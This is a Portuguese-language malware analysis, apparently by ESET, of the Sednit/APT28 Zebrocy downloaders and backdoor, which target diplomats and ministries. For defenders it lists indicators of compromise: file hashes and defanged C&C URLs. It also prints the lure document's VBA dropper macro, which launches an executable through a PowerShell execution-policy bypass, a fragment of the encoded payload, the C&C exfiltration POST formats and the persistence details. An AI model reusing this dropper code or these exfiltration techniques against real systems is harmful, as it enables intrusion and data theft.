O Sednit, também conhecido como APT28, Fancy Bear, Sofacy ou STRONTIUM ─ é um grupo de cibercriminosos que operam desde 2004, ou inclusive antes, e cujo principal objetivo é roubar informações confidenciais de alvos específicos.
Quase no final de 2015, começamos a observar um novo componente propagado pelo grupo: um downloader para o principal backdoor do Sednit: XAgent. No início de 2017, a Kaspersky mencionou pela primeira vez este componente em seu relatório de tendências APT e recentemente escreveu um artigo onde a ameaça era descrita com o nome de Zebrocy.
Este novo componente é uma família de malware que inclui downloaders e backdoors escritos em Delphi e AutoIt. Esses componentes têm o mesmo papel no ecossistema do Sednit como no do Seduploader - o primeiro estágio do malware.
Vimos que algumas das vítimas que foram alvo do Zebrocy estão localizadas no Azerbaijão, Bósnia e Herzegovina, Egito, Geórgia, Irã, Cazaquistão, Rússia, Arábia Saudita, Sérvia, Suíça, Tajiquistão, Turquia, Turcomenistão, Ucrânia, Uruguai e Zimbábue. Esses alvos incluem embaixadas, ministérios de relações exteriores e diplomatas.
A família Zebrocy é composta por três componentes. De acordo com a ordem de aparição, eles são: um downloader Delphi, um downloader AutoIt e um backdoor Delphi. A imagem 1 mostra a relação entre cada um desses componentes.
Neste artigo, descreveremos essa família e como ela pode coexistir com a antiga ferramenta de reconhecimento Seduploader, assim como no final falaremos sobre certas semelhanças e diferenças do Downdelph.
A Imagem 1 mostra o malware ativo e os métodos de ataque usados pelo Sednit, onde o uso de anexos via e-mail é o principal ponto de entrada do ecossistema Sednit. De acordo com um artigo publicado recentemente pela equipe da Palo Alto Networks, DealersChoice continua sendo usado. Tanto o Seduploader como o Zebrocy estão sendo ativamente propagados pelo grupo Sednit através de anexos de e-mail. Finalmente, após uma fase de reconhecimento, Xagent e Xtunnel são implantados em direção a alvos considerados interessantes por aqueles que os operam.
Métodos de ataque
O primeiro componente de um ataque baseado no Zebrocy chega como um e-mail. As vítimas são instigadas a abrir o anexo de um e-mail que pode ser um documento do Microsoft Office ou um arquivo.
Documentos maliciosos
Os documentos maliciosos usados pelo Sednit baixam o payload que é responsável pelo primeiro estágio através do Visual Basic para aplicaciones (VBA), exploits ou até mesmo usando o Dynamic Data Exchange (DDE). No final de 2017, o grupo Sednit lançou duas campanhas em que enviou dois tipos de documentos maliciosos. O primeiro foi chamado Syria – New Russia provocations.doc eo segundo foi chamado Note Letter Mary Christmas Card.doc.
Ambos os documentos maliciosos contêm uma macro VBA que cria um arquivo nomeado aleatoriamente em % TEMP%. O malware executável é então decodificado e gravado nesse arquivo, que é então executado por meio de um comando do PowerShell ou por meio do Scriptable Shell Objects.
[...]
Sub AutoClose()
On Error Resume Next
vAdd = ""
For I = 1 To 8
vAdd = vAdd + Chr(97 + Rnd(20) * 25)
Next
vFileName = Environ("temp") & "\" + vAdd & ".e" + "x" & "e"
SaveNew vFileName, UserForm1.Label1.Caption
Application.Run "XYZ", vFileName, "WScript.Shell"
End Sub
Public Function XYZ(vF, vW)
vStr = "powershell.exe -nop -Exec Bypass -Command Start-Process '" + vF + "';"
Call CreateObject(vW).Run(vStr, 0)
End Function
[...]
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu
[...]
Exemplo do Visual Basic e primeiro estágio chamado Syria – New Russia provocations.doc
Arquivos
Algumas campanhas usaram um arquivo para injetar o primeiro estágio no computador da vítima, em vez de usá-lo através de macros de documentos do Office. Além disso, provavelmente, esses arquivos chegaram ao destino como anexos em um e-mail.
Todo o primeiro estágio da família Zebrocy é composto por executáveis com um ícone e um nome de arquivo semelhante a um documento que tenta enganar a vítima, assim como mostra a Imagem 3.
Downloader Delphi
Um downloader Delphi é o primeiro estágio da família Zebrocy, embora tenhamos visto algumas campanhas do grupo Sednit nas quais eles usam o downloader AutoIt. A maioria desses downloaders binários Delphi usam ícones de documentos do Office ou outros como aqueles na biblioteca do Windows, e às vezes esses exemplos são empacotados com o UPX, um compressor executável gratuito. O objetivo nesta primeira etapa é recuperar o máximo de informações do computador da vítima.
Quando o malware é iniciado, uma janela pop-up aparece com uma falsa mensagem de erro que inclui o nome do arquivo binário que foi droppeado. Por exemplo, se o nome do arquivo for srsiymyw.exe, o nome do arquivo que aparece no pop-up será srsiymyw.doc (Imagem 4). O objetivo desse pop-up é distrair o usuário e fazê-lo acreditar que nada de estranho está acontecendo em seu computador.
De fato, o downloader está ocupado criando um arquivo em % TEMP% com um nome de arquivo codificado no binário (embora neste estágio o arquivo esteja vazio). A persistência é implementada adicionando uma chave de registro do Windows em HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ com o caminho do nome do arquivo codificado.
Para reunir informações, o malware cria um novo processo que utiliza a função CreateProcess da API do Windows com cmd.exe / c SYSTEMINFO & TASKLIST como argumento lpCommandLine. Depois que as informações são recuperadas, ele envia o resultado por meio de uma solicitação HTTP POST para o servidor C&C especificado no binário. Esta ação é repetida até receber o próximo estágio.
POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat)?fort=<SerialNumber_C> HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: xxxx
Host: <ip_address>
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
pol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A<DriveListing>%0D%0A%0D%0A<Path_to_the_binary>%0D%0A%0D%0A<SYSTEMINFO & TASKLIST output>
[...]
Downloader Delphi HTTP POST request
Depois que a solicitação é enviada, o servidor C&C responde enviando o próximo estágio, desde que o alvo infectado seja considerado de interesse pelo operador. O tempo entre o envio do relatório e o recebimento do payload é de algumas horas. Este próximo estágio é gravado no arquivo criado anteriormente e, em seguida, é executado.
Downloader AutoIt
O downloader AutoIt é outra camada da fase de reconhecimento durante a infecção do computador da vítima. A partir daqui, dois cenários são possíveis: no primeiro cenário possível, o primeiro estágio é o downloader Delphi e o segundo estágio - que é o downloader AutoIt - consiste em um downloader mais leve. No segundo cenário, o downloader AutoIt é o primeiro estágio e tem todas as funcionalidades do downloader Delphi e, inclusive, ainda mais.
Quando o downloader AutoIt é o primeiro dos estágios, ele executa muitas funções de reconhecimento. Inclusive compartilha algumas semelhanças com o downloader Delphi, como o mecanismo de persistência e a janela pop-up, mas adiciona mais detalhes à fase de reconhecimento do que o Downloader Delphi. Em seguida, compartilhamos uma lista (não muito extensa) de seus recursos:
- Detecta sandbox e ambientes virtuais
- Obtém uma lista dos programas instalados (via HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall)
- Obtém a versão do Windows (32-bit ou 64-bit)
- Obtém a lista de processos
- Obtém informações do disco rígido
- Obtém capturas de tela
- Obtém informações diversas informações sobre o computador da vítima usando o Windows Management Instrumentation (WMI) Objects, provavelmente inspirados pelo código desse repositório do GitHub.
Dependendo do estágio anterior, o nome do binário AutoIt pode ser diferente. Se o malware for lançado como o primeiro estágio, ele terá um nome de documento. Caso contrário, terá o nome codificado com o downloader Delphi, conforme podemos ver na Tabela 1.
Table 1: AutoIt binary filenames, depending of the first stage |
#colspan# |
---|---|
First Stage |
AutoIt binary Filenames |
Delphi downloader |
csrsvc.exe |
Email attachment |
Protocol List_20160606.exe |
O objetivo deste estágio é mais ou menos igual ao do anterior. Muitas versões estão disponíveis, mas todas incluem pelo menos o código para poder:
- Recuperar el número de serie del disco rígido C:
- Usar funciones de red de winhttp.dll o winhttp.au3
- Ejecutar el payload recibido desde el servidor C&C
Da mesma forma que o downloader Delphi tem uma janela pop-up, o AutoIt também tem uma pop-up quando vem a partir do anexo de um e-mail - o AutoIt é o primeiro estágio. A pop-up está relacionada ao programa representado pelo ícone do binário. Por exemplo, um downloader AutoIt com ícone do Adobe Reader exibe uma pop-up informando que o arquivo PDF que a vítima pretende abrir está corrompido. Um binário AutoIt com um ícone do Word exibirá o seguinte po-pup solicitando a senha. Embora a senha não seja considerada neste momento, acreditamos que é simplesmente uma forma de distrair a vítima da atividade realmente maliciosa do código.
Backdoor Delphi
O backdoor Delphi é a fase final da cadeia de componentes que compõem o Zebrocy. No passado, vimos o Zebrocy baixar o backdoor principal do grupo Sednit, chamado Xagent.
Ao contrário dos componentes anteriores, ele possui um número de versão interno que parece não estar relacionado a uma campanha específica. Este número de versão evoluiu ao longo do tempo, como pode ser visto na Tabela 2:
Table 2: Delphi backdoor internal version history |
#colspan# |
---|---|
PE timestamp | version |
2015-12-28 | 2.1 |
2016-01-06 | 2.2 |
2016-01-25 | 2.3 |
2016-02-03 | 2.4 |
2016-03-14 | 2.5 |
2016-04-08 | 3.0 |
2016-04-26 | 3.2 |
2016-06-01 | 4.4 |
2016-09-08 | 5.0 |
2016-12-15 | 5.1 |
2017-06-01 | 7.0 |
2017-09-26 | 8.0 |
2017-10-12 | 8.1 |
2017-11-12 | 8.2 |
2017-12-26 | 8.5 |
2018-01-09 | 8.6 |
2017-12-18 | 10.1 |
2018-01-09 | 10.2 |
2018-01-16 | 10.3 |
2018-01-18 | 11.0 |
2018-02-07 | 12.0 |
2018-03-05 | 13.0 |
2018-03-06 | 13.1 |
2018-03-14 | 14.0 |
2018-03-28 | 14.1 |
É importante esclarecer que não temos o panorama completo e podemos ter perdido algumas versões do backdoor. Além disso, há alguma sobreposição entre as versões, o que indica que algumas versões mais antigas ainda são usadas ao mesmo tempo que as novas versões.
Nos próximos parágrafos, detalharemos algumas das diferenças que vimos no malware durante sua evolução. O backdoor incorpora um bloco de configuração cujos valores mudam entre as diferentes amostras, embora a lista de itens configuráveis permaneça sempre a mesma. No entanto, a maneira como os dados de configuração são armazenados na amostra do malware evoluiu com o tempo.
A primeira versão do backdoor absorveu os dados de configuração em texto simples, como pode ser visto na imagem 6.
Por isso, em versões posteriores, os autores do malware codificaram os dados de configuração em cadeias hexadecimais, como pode ser visto na imagem 7.
Nas versões mais recentes, os dados de configuração são criptografados dentro dos recursos usando o algoritmo AES, enquanto que, nas versões mais antigas, eram armazenados na seção .text
Os dados de configuração contêm:
- Chaves AES para se comunicar com o servidor C&C
- Endereços (URLs) com padrões que diferem de uma amostra para outra
- A versão do malware
- A chave/valor do registro do Windows que garante a persistência do backdoor
- O caminho onde os arquivos temporários são armazenados (% APPDATA%)
- Os nomes dos diretórios escondidos que serão criados para armazenar os arquivos temporários: os nomes dos diretórios são concatenados com a variável de ambiente (% APPDATA%)
Depois que o malware é configurado, ele executa chamadas para outras funções por meio da função SetTimer da API do Windows. Essas chamadas permitem que o operador manipule várias funções e comandos de backdoor.
- Realiza capturas de tela do desktop da vítima
- Registra as teclas digitadas
- Cria uma lista dos recursos dos disco e das redes
- Lê e escreve no registro do Windows
- Copia, move ou exclui um objeto do sistema de arquivos (file system)
- Executa arquivos ou cria tarefas programadas
O número de comandos que o backdoor manipula ─ cerca de 30 ─ difere de uma versão para a outra. Para se comunicar com o servidor C&C, o backdoor armazena o relatório dessas funções em um arquivo temporário. Em seguida, ele lê o conteúdo do arquivo temporário e o envia. Esses arquivos temporários são armazenados em um dos diretórios escondidos criados durante a fase de configuração.
POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat). HTTP/1.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------<mmddyyhhnnsszzz>
Content-Length: <N>
Host: <ip_address>
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
----------<mmddyyhhnnsszzz>
Content-Disposition: form-data; name="userfile"; filename="%APPDATA%\Microsoft\<directories>\<tempfilename>.tmp"
Content-Type: <tempfilename_hex_encoded>.tmp
<tempfilename content>
----------<mmddyyhhnnsszzz>--
Backdoor Delphi POST request
O conteúdo do tempfilename é a saída de qualquer comando executado. O conteúdo é criptografado usando o algoritmo AES-256-ECB com a primeira chave AES dos dados de configuração e, em seguida, a saída é codificada em formato hexadecimal. O conteúdo enviado ao servidor C&C varia de um comando para outro, mas todos contêm pelo menos o número de série do disco rígido e os primeiros quatro bytes do nome do computador. Por exemplo, HELLO corresponde ao primeiro pacote enviado pelo backdoor para estabelecer contato com o servidor C&C. Como mostrado abaixo, ele contém a data em que a tarefa foi iniciada, o número da versão interna do backdoor Delphi, o número de série do HDD, o nome do computador (primeiros quatro bytes), o comando e a data de quando o backdoor foi executado.
Start: 1/4/2018 1:37:00 PM - [<vx.x>]:42424242ESET-HELLO-[2018-04-04 01-37-00]-315.TXT.
A segunda chave AES nos dados de configuração é usada para descriptografar a resposta do servidor C&C. Como o Seduploader, esse backdoor é usado para implantar o Xagent no computador da vítima, depois de ter sido considerado uma máquina de interesse do operador após a fase de reconhecimento.
Conclusão
Um componente escrito em Delphi não é algo novo para o grupo Sednit, já que anteriormente utilizava esta mesma linguagem para Downdelph. No entanto, mesmo sem este último componente ter algo em comum com o Downdelph "tecnicamente falando", há alguns pontos que vale a pena mencionar.
- Os métodos de implementação são os mesmos, pois ambos são entregues como anexos em um e-mail.
- A última vez que vimos a Downdelph foi em setembro de 2015, e a primeira amostra ativa do Zebrocy foi vista em novembro de 2015.
- Ambos estão escritos em Delphi
Podemos supor que o grupo Sednit abandonou um componente e começou a desenvolver um novo. No entanto, uma coisa que não mudou para o grupo são os erros cometidos:
- O nome da tarefa programada: Windiws
- O nome da função que recupera as informações do sistema no downloader AutoIt é _SOFWARE ()
- Mary em vez de Merry em Note Letter Mary Christmas Card.doc
A matriz de bytes usada pelo backdoor Delphi como chaves AES-256 tem 38 bytes de comprimento em vez de 32. Não é um erro de ortografia, mas apenas falta de atenção.
Vimos que o Zebrocy tem sido amplamente utilizado pelo grupo Sednit nos últimos dois anos. Nossa análise de várias das novas variantes que apareceram regularmente desde 2017 indica que o Zebrocy permanece ativo e sob constante manutenção por seu(s) autor(es). Portanto, podemos considerá-lo como uma das ferramentas estáveis do arsenal do grupo Sednit - uma ferramenta que merece ser monitorada de perto.
IoCs
Malicious documents
SHA-1 | ESET Detection name | Filename |
---|---|---|
4f07d18475601d0492cbf678ee0f0860c729910e | VBA/TrojanDropper.Agent.YC | Note Letter Mary Christmas Card.doc |
f10b2c052afc07e2dec9dbe816031059fdc900ba | VBA/TrojanDropper.Agent.AAK | Syria - New Russia provocations.doc |
Delphi downloader
SHA-1 | ESET Detection name |
---|---|
00b39f2deaf1f1fc29e5acb63f4d1100e04fd701 | Win32/TrojanDownloader.Delf.CFS |
07e44b44c5f1043d16f6011a2cf0d2e7c5a52787 | Win32/TrojanDownloader.Delf.CFG |
0f946f619ae8e2181a5bd76c8af03347742765c6 | Win32/TrojanDownloader.Delf.CGW |
2900ed173a9f5dc99f905942a6be595cc6f03387 | Win32/TrojanDownloader.Delf.CFG |
2b5a7f4e054d0130883c8821b629121e0228bf54 | Win32/TrojanDownloader.Delf.CIP |
36b5e59a01e7f244d4a3bbb539e57aa468115dc8 | Win32/TrojanDownloader.Delf.CGB |
37bd951c483da057337ef8f38d6e48051cbb39d0 | Win32/TrojanDownloader.Delf.CHC |
41686703ce9e9aec64b6ad1c516746751219bc62 | Win32/TrojanDownloader.Delf.CFS |
4e6470f4a245efaa138c8c6eedb046e916706383 | Win32/TrojanDownloader.Delf.CGW |
54b14fc84f152b43c63babc46f2597b053e94627 | Win32/TrojanDownloader.Delf.CGB |
afd5a60b7fff4deea15f7011339ad2cc2987a937 | Win32/TrojanDownloader.Delf.CGW |
d4ab51bc5c26183771e3358d76e348943f9dd2fc | Win32/TrojanDownloader.Delf.CGB |
d6fdc72792ee736b8d606d40d72cb89d6e8a3e18 | Win32/TrojanDownloader.Delf.CFU |
AutoIt downloader
SHA-1 | ESET Detection name |
---|---|
0cd61d367dd0b13000774ab77abf3d4cfb713c8e | Win32/TrojanDownloader.Autoit.ODO |
185ab7a371b58ff367c155ec0dabe28842d340bd | Win32/TrojanDownloader.Autoit.OBG |
267abd7105ac26d5cb6ecb96292f83708f64b994 | Win32/TrojanDownloader.Autoit.OHC |
4a6dcbccab5344388b331d543cc2260ca531c7ca | Win32/Autoit.CT |
62dcf2f33ecc6014fa9a10f4e9ac9fd9bb0a6d23 | Win32/TrojanDownloader.Autoit.OCO |
b8b847d3d0139db68dba730b3424b29dcb40b3c7 | Win32/TrojanDownloader.Autoit.OMA |
c0271dbb02636402742c390ffbeee6418f696668 | Win32/TrojanDownloader.Autoit.OMB |
d379b94a3eb4fd9c9a973f64d436d7fc2e9d6762 | Win32/Spy.Autoit.EI |
dabeadf0a9af3a8a0802f8445670806cd7671b1d | Win32/TrojanDownloader.Autoit.OCI |
Delphi backdoor
SHA-1 | ESET Detection name |
---|---|
0983d940ba42135106bf7a1e87ed5a1975fc7ead | Win32/Delf.BFF |
226083c7190f1a939d5b7b352400450690d59f65 | Win32/Delf.BDW |
245868d6805c66181808973e93f23293d6d2f7d1 | Win32/Delf.BDT |
2c01ae417e5de213845b1ed46d4e82d45edd598d | Win32/Delf.BBP |
4ccbe222bd97dc229b36efaf52520939da9d51c8 | Win32/Delf.BFC |
51ae516792570bcd069a657c27859cd3fdc07d00 | Win32/Delf.BBP |
55179f0c6bce5a37311a44efe3f9845096c09668 | Win32/Delf.AWE |
6fd7ce97061169b835ea77976651b5bf20aca4ef | Win32/TrojanDownloader.Delf.BRV |
7349843e4dac1226ad6ce3e3cda8c389dd599548 | Win32/TrojanDownloader.Delf.BRV |
7b5c223a4968cc2190c1b5444cad47187d27ec50 | Win32/TrojanDownloader.Delf.BRV |
83882e13b369986b513f4aae245c112b82ec2097 | Win32/Delf.BEB |
8aedf7a462024acf72d708c89230e4f02d94bc78 | Win32/Delf.BDT |
8bd56b580974ae195e9f92b3aa525547d33434c1 | Win32/Delf.BEC |
9beacd8e145fa01e16409d44d8b9470af6c7afd8 | Win32/Delf.BBP |
a172fe6e91170f858c8ce5d734c094996bdf83d0 | Win32/Delf.BDT |
ae93b6ec2d56512a1c7e8c053d2a6ce6fdfb7e4c | Win32/Delf.BEX |
c08d89c7f7be69d5d705d4ac7e24e8f48e22faaf | Win32/Delf.BDW |
c2f3ca699aef3d226a800c2262efdca1470e00dc | Win32/Delf.AVP |
cdf9c24b86bc9a872035dcf3f53f380c904ed98b | Win32/Delf.BEH |
f63e29621c8becac47ae6eac7bf9577bd0a37b73 | Win32/Delf.AVT |
fea8752d90d2b4f0fc49ac0d58d62090782d8c5b | Win32/Delf.BFN |
URLs
http://142[.]0.68.2/test-update-16-8852418/temp727612430/checkUpdate89732468.php
http://142[.]0.68.2/test-update-17-8752417/temp827612480/checkUpdate79832467.php
http://185[.]25.50.93/syshelp/kd8812u/protocol.php
http://185[.]25.50.93/tech99-04/litelib1/setwsdv4.php
http://185[.]25.50.93/techicalBS391-two/supptech18i/suppid.php
http://185[.]25.51.114/get-help-software/get-app-c/error-code-lookup.php
http://185[.]25.51.164/srv_upd_dest_two/destBB/en.php
http://185[.]25.51.198/get-data/searchId/get.php
http://185[.]25.51.198/stream-upd-service-two/definition/event.php
http://185[.]77.129.152/wWpYdSMRulkdp/arpz/MsKZrpUfe.php
http://188[.]241.68.121/update/dB-Release/NewBaseCheck.php
http://194[.]187.249.126/database-update-centre/check-system-version/id=18862.php
http://194[.]187.249.126/security-services-DMHA-group/info-update-version/id77820082.php
http://213[.]103.67.193/ghflYvz/vmwWIdx/realui.php
http://213[.]252.244.219/client-update-info/version-id/version333.php
http://213[.]252.244.219/cumulative-security-update/Summary/details.php
http://213[.]252.245.132/search-release/Search-Version/crmclients.php
http://213[.]252.245.132/setting-the-os-release/Support-OS-release/ApiMap.php
http://220[.]158.216.127/search-sys-update-release/base-sync/db7749sc.php
http://222[.]15.23.121/gft_piyes/ndhfkuryhs09/fdfd_iunb_hhert_ps.php
http://46[.]102.152.127/messageID/get-data/SecurityID.php
http://46[.]183.223.227/services-check-update/security-certificate-11-554/CheckNow864.php
http://80[.]255.6.5/daily-update-certifaicates52735462534234/update-15.dat
http://80[.]255.6.5/LoG-statistic8397420934809/date-update9048353094c/StaticIpUpdateLog23741033.php
http://86[.]105.18.106/apps.update/DetailsID/clientPID-118253.php
http://86[.]105.18.106/data-extract/timermodule/update-client.php
http://86[.]105.18.106/debug-info/pluginId/CLISD1934.php
http://86[.]105.18.106/ram-data/managerId/REM1234.php
http://86[.]105.18.106/versionID/Plugin0899/debug-release01119/debug-19.app
http://86[.]105.18.111/UpdateCertificate33-33725cnm^BB/CheckerNow-saMbA-99-36^11/CheckerSerface^8830-11.php
http://86[.]106.131.177/srvSettings/conf4421i/support.php
http://86[.]106.131.177/SupportA91i/syshelpA774i/viewsupp.php
http://89[.]249.65.166/clientid-and-uniqued-r2/the-differenceU/Events76.php
http://89[.]249.65.166/int-release/check-user/userid.php
http://89[.]249.65.234/guard-service/Servers-ip4/upd-release/mdb4
http://89[.]40.181.126/verification-online/service.911-19/check-verification-88291.php
http://89[.]45.67.153/grenadLibS44-two/fIndToClose12t3/sol41.php
http://89[.]45.67.153/supportfsys/t863321i/func112SerErr.php
http://93[.]113.131.117/KB7735-9927/security-serv/opt.php
http://93[.]113.131.155/Verifica-El-Lanzamiento/Ayuda-Del-Sistema/obtenerId.php
http://93[.]115.38.132/wWpYdSMRulkdp/arpz/MsKZrpUfe.php
http://rammatica[.]com/QqrAzMjp/CmKjzk/EspTkzmH.php
http://rammatica[.]com/QqrAzMjp/CmKjzk/OspRkzmG.php